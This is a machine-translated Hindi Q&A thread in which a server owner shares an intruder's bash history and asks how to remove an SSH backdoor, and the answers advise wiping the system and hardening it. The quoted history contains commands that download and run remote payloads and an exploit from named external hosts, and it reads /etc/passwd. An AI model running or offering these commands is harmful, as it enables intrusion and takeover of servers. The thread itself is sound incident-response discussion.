वीएसवर पर एसएसएच बैकडोर मिला। क्या करें?


24

कल मैंने अपने VServer पर कमांडों के अपने इतिहास की जाँच की। मुझे कई संदिग्ध लाइनें मिलीं।

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

विशेष रूप से sniffer.tgz ने मुझे झटका दिया। मैंने एक वर्चुअल मशीन स्थापित की और इस tgz आर्काइव को डाउनलोड किया। मैंने सेटअप शुरू किया और इसने मुझे ये पंक्तियाँ दीं:

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

क्या किसी को पता है कि यह कैसे निकालना है?


जवाबों:


66

यह वही है जो आपको उन सभी प्रणालियों पर करना चाहिए जो आपके पास इस sniffer.tgzपर हैं: तुरंत ऑर्बिट से Nuke Them , और एक साफ स्थापना से शुरू करें। (यही है, सिस्टम को नष्ट करें), क्लीन बैकअप को क्लीन करें, डेटा को क्लीन बैकअप से लोड करें - यह मानते हुए कि आपके पास बैकअप हैं जो साफ हैं, और फिर इंटरनेट पर वापस डालने से पहले सिस्टम को हार्ड करें।

जब भी आपके पास मैलवेयर या हैकर्स इस तरह से आपके सिस्टम में आते हैं, तो यह समय है कि आपके सिस्टम को कैसे कॉन्फ़िगर किया जाए और यह सुनिश्चित करें कि वे उसी चरणों को दोहराएं जो उन्हें मिला था। लेकिन, क्योंकि यह एक ऐसी प्रणाली नहीं हो सकती है जिसमें आपके पास एक तरफ और फॉरेंसिक रूप से विश्लेषण करने की क्षमता हो, और चूंकि यह आपका एकमात्र सर्वर हो सकता है, इसलिए यह केवल वर्चुअल सिस्टम को नष्ट करने का समय है, और खरोंच से शुरू करें (जैसा कि मैंने ऊपर कहा था)।

(और यह ऐसी किसी भी स्थिति पर लागू होता है जहां आपको सिस्टम पर मैलवेयर मिलता है। जब तक आपके पास ऐसा कुछ बदलने के लिए अतिरिक्त हार्डवेयर नहीं है, तो आप अलग-थलग पड़े सिस्टम की अलग-अलग जांच कर सकते हैं, जो आमतौर पर अधिकांश उपयोगकर्ताओं के पास नहीं होता है, लेकिन आपके पास कोई विकल्प नहीं होता है इस प्रणाली को शुरू करने और खत्म करने के लिए।)

आपके सर्वर का विश्लेषण किए बिना मैं वास्तव में यह नहीं कह सकता कि आपने क्या गलत किया, लेकिन संभावना है कि यह बैकडोर सिस्टम में एक साधारण 'प्रोग्राम' की तुलना में अधिक गहरा है जो स्थापित हो गया। और, चूंकि बुरे लोगों को पहले से ही आपके सिस्टम पर एक बैकडोर स्थापित करने के लिए मिला था, आप यह मान सकते हैं कि आपके सभी पासवर्ड अब भंग हो गए हैं और अब सुरक्षित नहीं हैं (चाहे वह एसएसएच, या मायएसक्यूएल रूट के लिए हो, या किसी अन्य प्रकार का पासवर्ड जो कभी भी हो इस कंप्यूटर सिस्टम में प्रवेश किया गया है)। आपके सभी पासवर्ड बदलने का समय !


एक बार जब आप एक स्वच्छ वातावरण में वापस आ जाते हैं, तो यहां कुछ बुनियादी सुझावों पर विचार करने के लिए सख्त कदम हैं। ध्यान दें कि क्योंकि यह एक विषय को और अधिक व्यापक बनाते हैं, मैं वास्तव में यहाँ विस्तार से खुदाई नहीं कर सकता, लेकिन यह निश्चित रूप से आपके सिस्टम की सुरक्षा के लिए कुछ सख्त कदम उठाने का समय है:

  1. एक फ़ायरवॉल चालू करें , और केवल उन बंदरगाहों तक पहुंच की अनुमति दें जिन्हें खोलने की आवश्यकता हैufwसरल होने के लिए मौजूद है, तो चलो उपयोग करते हैं। sudo ufw enable। ( ufwअपने वातावरण के लिए ठीक से कॉन्फ़िगर करना एक अलग कहानी है, और यह इस प्रश्न की सीमाओं से परे है।)

  2. दूरस्थ एसएसएच तक पहुंच को प्रतिबंधित करें । यह हमेशा उल्लेखनीय नहीं है, लेकिन आप आदर्श रूप से आईपी पते की पहचान करेंगे जो आपके स्वामित्व में हैं और विशेष रूप से उन्हें फ़ायरवॉल में श्वेत सूची में रखते हैं। (यदि आप एक गतिशील आवासीय आईपी पते पर हैं तो इस चरण को छोड़ दें)।

  3. अपने सर्वर पर एसएसएच एक्सेस को लॉक करें , और केवल प्रमाणीकरण के लिए एसएसएच कुंजी के उपयोग की आवश्यकता है । इस तरह से हैकर्स आपके सर्वर पर हमला नहीं कर सकते हैं और केवल पासवर्ड का अनुमान लगा सकते हैं। यह उचित निजी कुंजी का अनुमान लगाने के लिए बहुत कठिन है (क्योंकि आपको उन सभी को ब्रूटफोर्स करना होगा), और यह ब्रूटिंग हमलों से बचाने में मदद करता है।

  4. यदि आप एक वेबसाइट चला रहे हैं, तो अनुमतियों को लॉक करना सुनिश्चित करें ताकि लोग अपने अवकाश पर चीजों को अपलोड / निष्पादित न कर सकें । ऐसा करना साइट से साइट पर भिन्न होता है, इसलिए मैं आपको यहां अधिक मार्गदर्शन नहीं दे सकता (ऐसा करना असंभव है)।

  5. यदि आप जूमला या वर्डप्रेस या इस तरह का उपयोग करके एक वेबसाइट चला रहे हैं, तो सुनिश्चित करें कि आप सॉफ्टवेयर प्रदाताओं से सुरक्षा भेद्यता के साथ पर्यावरण को अद्यतित और संरक्षित रखें

  6. जहाँ संभव हो, सेटअप, कॉन्फ़िगर करें और उन चीज़ों के लिए दो-कारक प्रमाणीकरण (2FA) विधियों का उपयोग करें जिन्हें आप प्रमाणित करते हैं । विभिन्न एप्लिकेशन के लिए दूसरे-कारक प्रमाणीकरण के लिए कई समाधान हैं, और इस तरह से विभिन्न अनुप्रयोगों को सुरक्षित करना इस पद के दायरे से परे है, इसलिए आपको समाधान चुनने से पहले इस बिंदु पर अपना शोध करना चाहिए।

  7. अगर आपको बिलकुल चाहिए अपने सेटअप में पासवर्ड का उपयोग करते हैं, तो एक सभ्य पासवर्ड मैनेजर का उपयोग करें (क्लाउड-आधारित वाले आवश्यक रूप से अच्छे विकल्प नहीं हैं) और लंबी-लंबाई (25+ अक्षर), यादृच्छिक, अनमोल पासवर्ड का उपयोग करें जो कि प्रत्येक व्यक्तिगत आइटम के लिए अलग-अलग हैं। पासवर्ड द्वारा सुरक्षित (इसलिए पासवर्ड मैनेजर के लिए सिफारिश)। (हालांकि, आपको दृढ़ता से उन पासवर्डों का उपयोग करने पर विचार करना चाहिए जहां संभव हो (जैसे कि एसएसएच प्रमाणीकरण के लिए), और जहां संभव हो 2FA का उपयोग करें।


टिप्पणियाँ विस्तारित चर्चा के लिए नहीं हैं; इस वार्तालाप को बातचीत में स्थानांतरित कर दिया गया है ।
टेराडन

मैंने जवाब स्वीकार कर लिया, क्योंकि मैं यही करने जा रहा हूं। जब तक मैं वीएम पर पिछले दरवाजे को बंद करने की कोशिश नहीं करता, सिर्फ अपने निजी हित के लिए।
इसकाकाजो

0

अगर वहाँ एक पिछले दरवाजे है वहाँ 3 अधिक है। अलग, बैकअप डेटा, इसे nuke, और ध्यान से डेटा को पुनर्स्थापित करें। किसी भी क्रोन, php, या यहां तक ​​कि mysql डेटा से सावधान रहें, वे सभी समझौता किया जा सकता है। इस बिंदु पर याद रखें कि उनके पास आपके सभी पासवर्ड और हैश हैं, इसलिए यदि आप अन्य मशीनों को समान रूप से कॉन्फ़िगर करते हैं तो संभवतः वे भी हैक कर लेते हैं ... कठिन भाग यह पता लगा रहा है कि उन्हें कैसे शुरू करना है। यदि आपके पास प्लगइन्स / थीम आदि में मैलवेयर की तलाश में वर्डप्रेस है ... अपनी अनुमतियों की जांच करें, तो आपके पास हर जगह 777 हो सकते हैं। कोई सरल जवाब नहीं, आप बहुत काम देख रहे हैं।


जरूरी नहीं कि एक से अधिक हो, लेकिन अक्सर या संभावना है कि यहां ऐसा नहीं हो सकता है। और उनके पास सुनिश्चित करने के लिए उनके सभी पासवर्ड नहीं हो सकते हैं। और न ही यह "संभावित" है कि उन्होंने अन्य मशीनों को हैक किया है, आप उनके इरादों को नहीं जानते हैं और न ही क्या सूँघा था, या अगर खराब कार्यक्रम को भी सक्रिय किया गया था जो किसी भी तरह से मौजूद या भाग रहा था। और "सावधानीपूर्वक डेटा को पुनर्स्थापित करें" किसी चीज के लिए बहुत सामान्य सलाह है जिसके लिए बहुत सावधानीपूर्वक कार्रवाई की आवश्यकता होती है।
जेम्स
हमारी साइट का प्रयोग करके, आप स्वीकार करते हैं कि आपने हमारी Cookie Policy और निजता नीति को पढ़ और समझा लिया है।
Licensed under cc by-sa 3.0 with attribution required.